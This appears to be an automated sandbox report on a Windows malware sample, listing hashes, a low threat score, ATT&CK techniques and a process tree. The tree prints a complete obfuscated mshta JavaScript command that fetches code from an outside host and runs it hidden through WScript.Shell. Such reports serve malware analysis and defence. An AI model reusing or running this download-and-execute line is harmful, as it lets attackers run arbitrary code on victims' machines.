9608129701213f7565040f385e8c263d0daaa01ce31dcc7f95a7584c7bf4ad44

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240730-en
resource tags

arch:x64arch:x86image:win10v2004-20240730-enlocale:en-usos:windows10-2004-x64system
submitted
31-07-2024 10:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

db246897a0efe3c4b3cd4b9f832067815fa920045e9a5a3d0881dc9ffd958fb0.exe
Size

3KB
MD5

172da997f8be4c8d0318a322c8ee806e
SHA1

224d3e925800815e792af3a28f8d2dffb9c21e70
SHA256

db246897a0efe3c4b3cd4b9f832067815fa920045e9a5a3d0881dc9ffd958fb0
SHA512

75e85d44f076dee7505389284609ab4b138d676d777e3ebfe37e11053b293b7f5d91cfb66a4304539fb41c91db74c79ec93d262cbe1e908ffd5f530be4475ca4

Score

3^/10

discovery

Malware Config

Signatures

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	db246897a0efe3c4b3cd4b9f832067815fa920045e9a5a3d0881dc9ffd958fb0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 3792 wrote to memory of 2656	3792	db246897a0efe3c4b3cd4b9f832067815fa920045e9a5a3d0881dc9ffd958fb0.exe	85
PID 3792 wrote to memory of 2656	3792	db246897a0efe3c4b3cd4b9f832067815fa920045e9a5a3d0881dc9ffd958fb0.exe	85
PID 3792 wrote to memory of 2656	3792	db246897a0efe3c4b3cd4b9f832067815fa920045e9a5a3d0881dc9ffd958fb0.exe	85

C:\Users\Admin\AppData\Local\Temp\db246897a0efe3c4b3cd4b9f832067815fa920045e9a5a3d0881dc9ffd958fb0.exe
"C:\Users\Admin\AppData\Local\Temp\db246897a0efe3c4b3cd4b9f832067815fa920045e9a5a3d0881dc9ffd958fb0.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3792
- C:\Windows\SysWOW64\mshta.exe
  mshta "javascript:document.write();159;y=unescape('%361%7Eh%74t%70%3A%2F%2F%61s%750%37%2E%66u%6E%2F%68r%69%2F%3F2%31a%36e%34b%7E2%31').split('~');56;try{x='WinHttp';176;x=new ActiveXObject(x+'.'+x+'Request.5.1');175;x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1);251;x.send();120;y='ipt.S';132;new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2);32;}catch(e){};239;;window.close();"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2656

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads